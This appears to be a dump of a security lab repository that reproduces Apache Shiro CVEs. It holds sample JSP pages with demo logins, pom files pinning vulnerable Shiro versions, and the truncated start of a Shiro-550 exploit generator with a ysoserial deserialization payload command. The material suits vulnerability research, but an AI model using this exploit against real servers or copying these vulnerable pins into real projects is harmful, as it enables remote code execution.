/shiro-721/src/main/webapp/home.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | Apache Shiro Quickstart 25 | 26 | 27 | 28 |

Apache Shiro Quickstart

29 | 30 |

Hi Guest! 31 | ( " onclick="document.getElementById('logout_form').submit();return false;">logout 32 | ">Log in (sample accounts provided) ) 33 |

34 | 35 |

Welcome to the Apache Shiro Quickstart sample application. 36 | This page represents the home page of any web application.

37 | 38 |

Visit your ">account page.

39 |

If you want to access the user-only ">account page, 40 | you will need to log-in first.

41 | 42 |

Roles

43 | 44 |

To show some taglibs, here are the roles you have and don't have. Log out and log back in under different user 45 | accounts to see different roles.

46 | 47 |

Roles you have

48 | 49 |

50 | admin
51 | president
52 | darklord
53 | goodguy
54 | schwartz
55 |

56 | 57 |

Roles you DON'T have

58 | 59 |

60 | admin
61 | president
62 | darklord
63 | goodguy
64 | schwartz
65 |

66 | 67 |
" method="post">
68 | 69 | 70 | -------------------------------------------------------------------------------- /shiro_cve-2020-11989/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.6.RELEASE 9 | 10 | 11 | org.syclover 12 | srpingboot-shiro 13 | 0.0.1-SNAPSHOT 14 | srpingboot-shiro 15 | Demo project for Spring Boot 16 | war 17 | 18 | 19 | 1.8 20 | 21 | 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-web 26 | 27 | 28 | org.springframework.boot 29 | spring-boot-starter-tomcat 30 | 31 | 32 | 33 | 34 | 35 | 36 | javax.servlet 37 | javax.servlet-api 38 | 4.0.1 39 | provided 40 | 41 | 42 | 43 | org.apache.shiro 44 | shiro-web 45 | 1.5.1 46 | 47 | 48 | org.apache.shiro 49 | shiro-spring 50 | 1.5.1 51 | 52 | 53 | 54 | org.springframework.boot 55 | spring-boot-starter-test 56 | test 57 | 58 | 59 | org.junit.vintage 60 | junit-vintage-engine 61 | 62 | 63 | 64 | 65 | org.springframework.boot 66 | spring-boot-starter-web 67 | 68 | 69 | 70 | 71 | 72 | 73 | org.springframework.boot 74 | spring-boot-maven-plugin 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /shiro_cve-2020-13933/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.6.RELEASE 9 | 10 | 11 | org.syclover 12 | srpingboot-shiro 13 | 0.0.1-SNAPSHOT 14 | srpingboot-shiro 15 | Demo project for Spring Boot 16 | war 17 | 18 | 19 | 1.8 20 | 21 | 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-web 26 | 27 | 28 | org.springframework.boot 29 | spring-boot-starter-tomcat 30 | 31 | 32 | 33 | 34 | 35 | 36 | javax.servlet 37 | javax.servlet-api 38 | 4.0.1 39 | provided 40 | 41 | 42 | 43 | org.apache.shiro 44 | shiro-web 45 | 1.5.3 46 | 47 | 48 | org.apache.shiro 49 | shiro-spring 50 | 1.5.3 51 | 
52 | 53 | 54 | org.springframework.boot 55 | spring-boot-starter-test 56 | test 57 | 58 | 59 | org.junit.vintage 60 | junit-vintage-engine 61 | 62 | 63 | 64 | 65 | org.springframework.boot 66 | spring-boot-starter-web 67 | 68 | 69 | 70 | 71 | 72 | 73 | org.springframework.boot 74 | spring-boot-maven-plugin 75 | 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/home.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | Apache Shiro Quickstart 25 | 26 | 27 | 28 |

Apache Shiro Quickstart

29 | 30 |

Hi Guest! 31 | ( " onclick="document.getElementById('logout_form').submit();return false;">logout 32 | ">Log in (sample accounts provided) ) 33 |

34 | 35 |

Welcome to the Apache Shiro Quickstart sample application. 36 | This page represents the home page of any web application.

37 | 38 |

Visit your ">account page.

39 |

If you want to access the user-only ">account page, 40 | you will need to log-in first.

41 | 42 |

Roles

43 | 44 |

To show some taglibs, here are the roles you have and don't have. Log out and log back in under different user 45 | accounts to see different roles.

46 | 47 |

Roles you have

48 | 49 |

50 | admin
51 | president
52 | darklord
53 | goodguy
54 | schwartz
55 |

56 | 57 |

Roles you DON'T have

58 | 59 |

60 | admin
61 | president
62 | darklord
63 | goodguy
64 | schwartz
65 |

66 | 67 |
" method="post">
68 | 69 | 70 | -------------------------------------------------------------------------------- /shiro-721/src/main/webapp/login.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Please Log in

28 | 29 | 30 |

Here are a few sample accounts to play with in the default text-based Realm (used for this 31 | demo and test installs only). Do you remember the movie these names came from? ;)

32 | 33 | 34 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 |
UsernamePassword
rootsecret
presidentskroob12345
darkhelmetludicrousspeed
lonestarrvespa
87 |

88 |
89 | 90 |
91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 |
Username:
Password:
Remember Me
107 |
108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/login.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | ~ Licensed to the Apache Software Foundation (ASF) under one 3 | ~ or more contributor license agreements. See the NOTICE file 4 | ~ distributed with this work for additional information 5 | ~ regarding copyright ownership. The ASF licenses this file 6 | ~ to you under the Apache License, Version 2.0 (the 7 | ~ "License"); you may not use this file except in compliance 8 | ~ with the License. You may obtain a copy of the License at 9 | ~ 10 | ~ http://www.apache.org/licenses/LICENSE-2.0 11 | ~ 12 | ~ Unless required by applicable law or agreed to in writing, 13 | ~ software distributed under the License is distributed on an 14 | ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY 15 | ~ KIND, either express or implied. See the License for the 16 | ~ specific language governing permissions and limitations 17 | ~ under the License. 18 | --%> 19 | <%@ include file="include.jsp" %> 20 | 21 | 22 | 23 | "/> 24 | 25 | 26 | 27 |

Please Log in

28 | 29 | 30 |

Here are a few sample accounts to play with in the default text-based Realm (used for this 31 | demo and test installs only). Do you remember the movie these names came from? ;)

32 | 33 | 34 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 |
UsernamePassword
rootsecret
presidentskroob12345
darkhelmetludicrousspeed
lonestarrvespa
87 |

88 |
89 | 90 |
91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 |
Username:
Password:
Remember Me
107 |
108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /shiro-721/target/classes/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 
(https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: 
Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-721/target/test-classes/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 
| 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) 
org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-721/target/maven-shared-archive-resources/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The 
Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing 
(http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-721/target/samples-web-1.4.1/WEB-INF/classes/META-INF/DEPENDENCIES: -------------------------------------------------------------------------------- 1 | // ------------------------------------------------------------------ 2 | // Transitive dependencies of this project determined from the 3 | // maven pom organized by organization. 
4 | // ------------------------------------------------------------------ 5 | 6 | Apache Shiro :: Samples :: Web 7 | 8 | 9 | From: 'an unknown organization' 10 | - jstl javax.servlet:jstl:jar:1.2 11 | 12 | 13 | From: 'Apache Software Foundation' (http://www.apache.org) 14 | - Apache Log4j (http://logging.apache.org/log4j/1.2/) log4j:log4j:bundle:1.2.17 15 | License: The Apache Software License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 16 | 17 | From: 'QOS.ch' (http://www.qos.ch) 18 | - JCL 1.1.1 implemented over SLF4J (http://www.slf4j.org) org.slf4j:jcl-over-slf4j:jar:1.7.21 19 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 20 | - SLF4J API Module (http://www.slf4j.org) org.slf4j:slf4j-api:jar:1.7.21 21 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 22 | - SLF4J LOG4J-12 Binding (http://www.slf4j.org) org.slf4j:slf4j-log4j12:jar:1.7.21 23 | License: MIT License (http://www.opensource.org/licenses/mit-license.php) 24 | 25 | From: 'The Apache Software Foundation' (http://www.apache.org/) 26 | - Apache Commons Collections (http://commons.apache.org/collections/) commons-collections:commons-collections:jar:3.2.2 27 | License: Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) 28 | 29 | From: 'The Apache Software Foundation' (https://www.apache.org/) 30 | - Apache Commons BeanUtils (https://commons.apache.org/proper/commons-beanutils/) commons-beanutils:commons-beanutils:jar:1.9.3 31 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 32 | - Apache Shiro :: Cache (http://shiro.apache.org/shiro-cache/) org.apache.shiro:shiro-cache:bundle:1.4.1 33 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 34 | - Apache Shiro :: Configuration :: Core (http://shiro.apache.org/shiro-config/shiro-config-core/) org.apache.shiro:shiro-config-core:bundle:1.4.1 35 | License: Apache License, Version 2.0 
(https://www.apache.org/licenses/LICENSE-2.0.txt) 36 | - Apache Shiro :: Configuration :: OGDL (http://shiro.apache.org/shiro-config/shiro-config-ogdl/) org.apache.shiro:shiro-config-ogdl:bundle:1.4.1 37 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 38 | - Apache Shiro :: Core (http://shiro.apache.org/shiro-core/) org.apache.shiro:shiro-core:bundle:1.4.1 39 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 40 | - Apache Shiro :: Cryptography :: Ciphers (http://shiro.apache.org/shiro-crypto/shiro-crypto-cipher/) org.apache.shiro:shiro-crypto-cipher:bundle:1.4.1 41 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 42 | - Apache Shiro :: Cryptography :: Core (http://shiro.apache.org/shiro-crypto/shiro-crypto-core/) org.apache.shiro:shiro-crypto-core:bundle:1.4.1 43 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 44 | - Apache Shiro :: Cryptography :: Hashing (http://shiro.apache.org/shiro-crypto/shiro-crypto-hash/) org.apache.shiro:shiro-crypto-hash:bundle:1.4.1 45 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 46 | - Apache Shiro :: Event (http://shiro.apache.org/shiro-event/) org.apache.shiro:shiro-event:bundle:1.4.1 47 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 48 | - Apache Shiro :: Lang (http://shiro.apache.org/shiro-lang/) org.apache.shiro:shiro-lang:bundle:1.4.1 49 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 50 | - Apache Shiro :: Web (http://shiro.apache.org/shiro-web/) org.apache.shiro:shiro-web:bundle:1.4.1 51 | License: Apache License, Version 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt) 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /shiro-550/pom.xml: 
-------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | com.example 6 | shiro-550 7 | 0.0.1-SNAPSHOT 8 | shiro-550 9 | Demo project for Spring Boot 10 | 11 | 12 | 1.8 13 | UTF-8 14 | UTF-8 15 | 2.3.7.RELEASE 16 | 17 | 18 | 19 | 20 | org.springframework.boot 21 | spring-boot-starter-web 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-thymeleaf 26 | 27 | 28 | org.apache.shiro 29 | shiro-core 30 | 1.2.4 31 | 32 | 33 | org.apache.shiro 34 | shiro-spring 35 | 1.2.4 36 | 37 | 38 | 39 | commons-beanutils 40 | commons-beanutils 41 | 1.9.2 42 | 43 | 44 | 45 | org.springframework.boot 46 | spring-boot-starter-test 47 | test 48 | 49 | 50 | org.junit.vintage 51 | junit-vintage-engine 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | org.springframework.boot 61 | spring-boot-dependencies 62 | ${spring-boot.version} 63 | pom 64 | import 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | org.apache.maven.plugins 73 | maven-compiler-plugin 74 | 3.8.1 75 | 76 | 1.8 77 | 1.8 78 | UTF-8 79 | 80 | 81 | 82 | org.springframework.boot 83 | spring-boot-maven-plugin 84 | 2.3.7.RELEASE 85 | 86 | com.example.shiro550.Shiro550Application 87 | 88 | 89 | 90 | repackage 91 | 92 | repackage 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /shiro_cve-2020-17523/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 4.0.0 5 | 6 | org.springframework.boot 7 | spring-boot-starter-parent 8 | 2.2.6.RELEASE 9 | 10 | 11 | org.syclover 12 | srpingboot-shiro 13 | 0.0.1-SNAPSHOT 14 | srpingboot-shiro 15 | Demo project for Spring Boot 16 | war 17 | 18 | 19 | 1.8 20 | 21 | 22 | 23 | 24 | org.springframework.boot 25 | spring-boot-starter-web 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | javax.servlet 37 | javax.servlet-api 38 | 4.0.1 39 | provided 40 | 41 | 42 | 43 | org.apache.shiro 44 | shiro-web 45 | 1.7.0 46 | 47 | 48 | 
org.apache.shiro 49 | shiro-core 50 | 1.7.0 51 | 52 | 53 | org.apache.shiro 54 | shiro-spring 55 | 1.7.0 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | org.apache.commons 72 | commons-collections4 73 | 4.0 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | org.springframework.boot 84 | spring-boot-starter-test 85 | test 86 | 87 | 88 | org.junit.vintage 89 | junit-vintage-engine 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | org.springframework.boot 99 | spring-boot-maven-plugin 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /shiro-550/src/main/java/com/example/shiro550/exp/GenPayload.java: -------------------------------------------------------------------------------- 1 | package com.example.shiro550.exp; 2 | 3 | import org.apache.shiro.crypto.AesCipherService; 4 | import org.apache.shiro.codec.CodecSupport; 5 | import org.apache.shiro.util.ByteSource; 6 | import org.apache.shiro.codec.Base64; 7 | import org.apache.shiro.io.DefaultSerializer; 8 | 9 | import java.nio.file.FileSystems; 10 | import java.nio.file.Files; 11 | import java.nio.file.Paths; 12 | 13 | public class GenPayload { 14 | public static void main(String[] args) throws Exception { 15 | byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("D:\\EXP\\poc.ser")); //java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "calc.exe" > poc.ser 16 | 17 | AesCipherService aes = new AesCipherService(); 18 | byte[] key = 